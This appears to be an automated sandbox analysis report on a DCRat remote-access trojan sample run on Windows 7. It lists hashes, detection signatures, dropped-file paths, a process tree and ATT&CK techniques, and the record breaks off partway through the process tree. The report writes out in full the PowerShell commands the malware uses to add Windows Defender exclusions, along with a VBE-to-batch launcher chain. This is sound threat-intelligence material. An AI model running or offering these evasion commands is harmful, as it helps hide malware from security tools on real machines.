dcrat | 862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399

Analysis

max time kernel
146s
max time network
141s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-12-2024 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe
Size

1.3MB
MD5

f79c3da4a3ea5a8ea029a94a66f87436
SHA1

998cf7bb2a811d578a34c6bad1f35bb4abf31a70
SHA256

862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399
SHA512

6dd0655c563c4c7f279b9bdb98dfcf4223138df82bfe81a4635d58311fc6cc57f29040d6c0c161984ff3b3b9f64280be9ee436614872108e225983007f667a7b
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2636	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	868	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1624	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1844	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1420	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2428	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1224	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1740	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1980	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1368	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1348	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2464	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2316	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	884	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1376	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2740	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1020	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1684	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1348	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2892	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2488	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2920	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2860	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2152	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	552	2888	schtasks.exe	35
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1484	2888	schtasks.exe	35

DCRat payload 11 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000700000001903b-9.dat	dcrat
behavioral1/memory/2764-13-0x0000000001090000-0x00000000011A0000-memory.dmp	dcrat
behavioral1/memory/108-107-0x0000000000350000-0x0000000000460000-memory.dmp	dcrat
behavioral1/memory/1724-257-0x0000000001210000-0x0000000001320000-memory.dmp	dcrat
behavioral1/memory/2256-434-0x0000000000160000-0x0000000000270000-memory.dmp	dcrat
behavioral1/memory/1796-494-0x00000000000E0000-0x00000000001F0000-memory.dmp	dcrat
behavioral1/memory/3016-554-0x00000000010D0000-0x00000000011E0000-memory.dmp	dcrat
behavioral1/memory/2188-615-0x0000000000210000-0x0000000000320000-memory.dmp	dcrat
behavioral1/memory/1532-675-0x00000000003D0000-0x00000000004E0000-memory.dmp	dcrat
behavioral1/memory/2616-735-0x0000000000800000-0x0000000000910000-memory.dmp	dcrat
behavioral1/memory/1600-793-0x0000000000930000-0x0000000000A40000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1816	powershell.exe
2264	powershell.exe
1576	powershell.exe
2164	powershell.exe
2336	powershell.exe
2588	powershell.exe
2272	powershell.exe
2724	powershell.exe
2884	powershell.exe
2760	powershell.exe
2852	powershell.exe
2784	powershell.exe
2916	powershell.exe
2792	powershell.exe
2848	powershell.exe
1384	powershell.exe
1392	powershell.exe
2804	powershell.exe
1980	powershell.exe
1728	powershell.exe
2992	powershell.exe
2020	powershell.exe
1744	powershell.exe
1376	powershell.exe
2896	powershell.exe
1976	powershell.exe
2952	powershell.exe
908	powershell.exe
1528	powershell.exe
2616	powershell.exe
2428	powershell.exe
2252	powershell.exe

Executes dropped EXE 12 IoCs

pid	Process
2764	DllCommonsvc.exe
108	DllCommonsvc.exe
1724	taskhost.exe
1420	taskhost.exe
568	taskhost.exe
2256	taskhost.exe
1796	taskhost.exe
3016	taskhost.exe
2188	taskhost.exe
1532	taskhost.exe
2616	taskhost.exe
1600	taskhost.exe

Loads dropped DLL 2 IoCs

pid	Process
2376	cmd.exe
2376	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
19	raw.githubusercontent.com
22	raw.githubusercontent.com
25	raw.githubusercontent.com
31	raw.githubusercontent.com
4	raw.githubusercontent.com
12	raw.githubusercontent.com
15	raw.githubusercontent.com
28	raw.githubusercontent.com
5	raw.githubusercontent.com

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MSBuild\Microsoft\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\smss.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\sppsvc.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Portable Devices\69ddcba757bf72	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\6ccacd8608530f	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\0a1fd5f707cd16	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\69ddcba757bf72	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\System\msadc\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\Idle.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Defender\fr-FR\0a1fd5f707cd16	DllCommonsvc.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\56085415360792	DllCommonsvc.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\wininit.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\System\msadc\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Program Files\Windows Portable Devices\smss.exe	DllCommonsvc.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\Windows\fr-FR\lsm.exe	DllCommonsvc.exe
File created	C:\Windows\fr-FR\101b941d020240	DllCommonsvc.exe
File created	C:\Windows\it-IT\WmiPrvSE.exe	DllCommonsvc.exe
File created	C:\Windows\it-IT\24dbde2999530e	DllCommonsvc.exe
File created	C:\Windows\winsxs\amd64_microsoft-windows-help-ripbsyn.resources_31bf3856ad364e35_6.1.7600.16385_es-es_3eae274bc8057a96\dllhost.exe	DllCommonsvc.exe
File created	C:\Windows\ja-JP\smss.exe	DllCommonsvc.exe
File created	C:\Windows\ja-JP\69ddcba757bf72	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1740	schtasks.exe
2316	schtasks.exe
2328	schtasks.exe
552	schtasks.exe
1200	schtasks.exe
536	schtasks.exe
2604	schtasks.exe
2776	schtasks.exe
1944	schtasks.exe
2508	schtasks.exe
684	schtasks.exe
2644	schtasks.exe
1700	schtasks.exe
1420	schtasks.exe
2428	schtasks.exe
1932	schtasks.exe
1368	schtasks.exe
1620	schtasks.exe
1788	schtasks.exe
2860	schtasks.exe
1108	schtasks.exe
908	schtasks.exe
2808	schtasks.exe
1932	schtasks.exe
2824	schtasks.exe
1808	schtasks.exe
2892	schtasks.exe
2720	schtasks.exe
2920	schtasks.exe
2368	schtasks.exe
2664	schtasks.exe
2464	schtasks.exe
2296	schtasks.exe
1592	schtasks.exe
1696	schtasks.exe
1924	schtasks.exe
1980	schtasks.exe
2164	schtasks.exe
1376	schtasks.exe
2476	schtasks.exe
3060	schtasks.exe
2736	schtasks.exe
1628	schtasks.exe
2488	schtasks.exe
2356	schtasks.exe
2152	schtasks.exe
1864	schtasks.exe
2012	schtasks.exe
1020	schtasks.exe
2772	schtasks.exe
2632	schtasks.exe
1012	schtasks.exe
1588	schtasks.exe
2812	schtasks.exe
2940	schtasks.exe
1988	schtasks.exe
2036	schtasks.exe
1348	schtasks.exe
2740	schtasks.exe
2668	schtasks.exe
1828	schtasks.exe
1620	schtasks.exe
1596	schtasks.exe
1856	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
2764	DllCommonsvc.exe
1816	powershell.exe
2252	powershell.exe
2020	powershell.exe
1384	powershell.exe
2852	powershell.exe
1528	powershell.exe
2804	powershell.exe
2848	powershell.exe
2916	powershell.exe
2588	powershell.exe
908	powershell.exe
1392	powershell.exe
108	DllCommonsvc.exe
108	DllCommonsvc.exe
108	DllCommonsvc.exe
108	DllCommonsvc.exe
108	DllCommonsvc.exe
2952	powershell.exe
2164	powershell.exe
2792	powershell.exe
1744	powershell.exe
2784	powershell.exe
2884	powershell.exe
2992	powershell.exe
1976	powershell.exe
1728	powershell.exe
2760	powershell.exe
2336	powershell.exe
1576	powershell.exe
2264	powershell.exe
2724	powershell.exe
2896	powershell.exe
1376	powershell.exe
2272	powershell.exe
2616	powershell.exe
1980	powershell.exe
2428	powershell.exe
1724	taskhost.exe
1420	taskhost.exe
568	taskhost.exe
2256	taskhost.exe
1796	taskhost.exe
3016	taskhost.exe
2188	taskhost.exe
1532	taskhost.exe
2616	taskhost.exe
1600	taskhost.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	DllCommonsvc.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	108	DllCommonsvc.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	1724	taskhost.exe
Token: SeDebugPrivilege	1420	taskhost.exe
Token: SeDebugPrivilege	568	taskhost.exe
Token: SeDebugPrivilege	2256	taskhost.exe
Token: SeDebugPrivilege	1796	taskhost.exe
Token: SeDebugPrivilege	3016	taskhost.exe
Token: SeDebugPrivilege	2188	taskhost.exe
Token: SeDebugPrivilege	1532	taskhost.exe
Token: SeDebugPrivilege	2616	taskhost.exe
Token: SeDebugPrivilege	1600	taskhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2584 wrote to memory of 2380	2584	JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe	30
PID 2584 wrote to memory of 2380	2584	JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe	30
PID 2584 wrote to memory of 2380	2584	JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe	30
PID 2584 wrote to memory of 2380	2584	JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe	30
PID 2380 wrote to memory of 2376	2380	WScript.exe	32
PID 2380 wrote to memory of 2376	2380	WScript.exe	32
PID 2380 wrote to memory of 2376	2380	WScript.exe	32
PID 2380 wrote to memory of 2376	2380	WScript.exe	32
PID 2376 wrote to memory of 2764	2376	cmd.exe	34
PID 2376 wrote to memory of 2764	2376	cmd.exe	34
PID 2376 wrote to memory of 2764	2376	cmd.exe	34
PID 2376 wrote to memory of 2764	2376	cmd.exe	34
PID 2764 wrote to memory of 2020	2764	DllCommonsvc.exe	69
PID 2764 wrote to memory of 2020	2764	DllCommonsvc.exe	69
PID 2764 wrote to memory of 2020	2764	DllCommonsvc.exe	69
PID 2764 wrote to memory of 2848	2764	DllCommonsvc.exe	70
PID 2764 wrote to memory of 2848	2764	DllCommonsvc.exe	70
PID 2764 wrote to memory of 2848	2764	DllCommonsvc.exe	70
PID 2764 wrote to memory of 1816	2764	DllCommonsvc.exe	72
PID 2764 wrote to memory of 1816	2764	DllCommonsvc.exe	72
PID 2764 wrote to memory of 1816	2764	DllCommonsvc.exe	72
PID 2764 wrote to memory of 2916	2764	DllCommonsvc.exe	73
PID 2764 wrote to memory of 2916	2764	DllCommonsvc.exe	73
PID 2764 wrote to memory of 2916	2764	DllCommonsvc.exe	73
PID 2764 wrote to memory of 908	2764	DllCommonsvc.exe	74
PID 2764 wrote to memory of 908	2764	DllCommonsvc.exe	74
PID 2764 wrote to memory of 908	2764	DllCommonsvc.exe	74
PID 2764 wrote to memory of 2588	2764	DllCommonsvc.exe	75
PID 2764 wrote to memory of 2588	2764	DllCommonsvc.exe	75
PID 2764 wrote to memory of 2588	2764	DllCommonsvc.exe	75
PID 2764 wrote to memory of 2804	2764	DllCommonsvc.exe	76
PID 2764 wrote to memory of 2804	2764	DllCommonsvc.exe	76
PID 2764 wrote to memory of 2804	2764	DllCommonsvc.exe	76
PID 2764 wrote to memory of 1528	2764	DllCommonsvc.exe	77
PID 2764 wrote to memory of 1528	2764	DllCommonsvc.exe	77
PID 2764 wrote to memory of 1528	2764	DllCommonsvc.exe	77
PID 2764 wrote to memory of 1392	2764	DllCommonsvc.exe	78
PID 2764 wrote to memory of 1392	2764	DllCommonsvc.exe	78
PID 2764 wrote to memory of 1392	2764	DllCommonsvc.exe	78
PID 2764 wrote to memory of 2852	2764	DllCommonsvc.exe	80
PID 2764 wrote to memory of 2852	2764	DllCommonsvc.exe	80
PID 2764 wrote to memory of 2852	2764	DllCommonsvc.exe	80
PID 2764 wrote to memory of 1384	2764	DllCommonsvc.exe	81
PID 2764 wrote to memory of 1384	2764	DllCommonsvc.exe	81
PID 2764 wrote to memory of 1384	2764	DllCommonsvc.exe	81
PID 2764 wrote to memory of 2252	2764	DllCommonsvc.exe	83
PID 2764 wrote to memory of 2252	2764	DllCommonsvc.exe	83
PID 2764 wrote to memory of 2252	2764	DllCommonsvc.exe	83
PID 2764 wrote to memory of 3016	2764	DllCommonsvc.exe	93
PID 2764 wrote to memory of 3016	2764	DllCommonsvc.exe	93
PID 2764 wrote to memory of 3016	2764	DllCommonsvc.exe	93
PID 3016 wrote to memory of 1296	3016	cmd.exe	95
PID 3016 wrote to memory of 1296	3016	cmd.exe	95
PID 3016 wrote to memory of 1296	3016	cmd.exe	95
PID 3016 wrote to memory of 108	3016	cmd.exe	96
PID 3016 wrote to memory of 108	3016	cmd.exe	96
PID 3016 wrote to memory of 108	3016	cmd.exe	96
PID 108 wrote to memory of 2792	108	DllCommonsvc.exe	154
PID 108 wrote to memory of 2792	108	DllCommonsvc.exe	154
PID 108 wrote to memory of 2792	108	DllCommonsvc.exe	154
PID 108 wrote to memory of 2992	108	DllCommonsvc.exe	155
PID 108 wrote to memory of 2992	108	DllCommonsvc.exe	155
PID 108 wrote to memory of 2992	108	DllCommonsvc.exe	155
PID 108 wrote to memory of 2952	108	DllCommonsvc.exe	156

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_862723689381d46cec954218f7ec13f8ae007d140e6a82b4d945b6c0a5468399.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2764
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft Help\taskhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\NetHood\audiodg.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\fr-FR\lsm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\System\msadc\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\fr-FR\sppsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\services.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dwm.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1528
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\smss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\es-ES\wininit.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Desktop\WmiPrvSE.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1f4ba082-69f6-11ef-a143-62cb582c238c\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ExLSua8OZw.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3016
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:1296
      - C:\providercommon\DllCommonsvc.exe
        
        "C:\providercommon\DllCommonsvc.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\My Documents\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
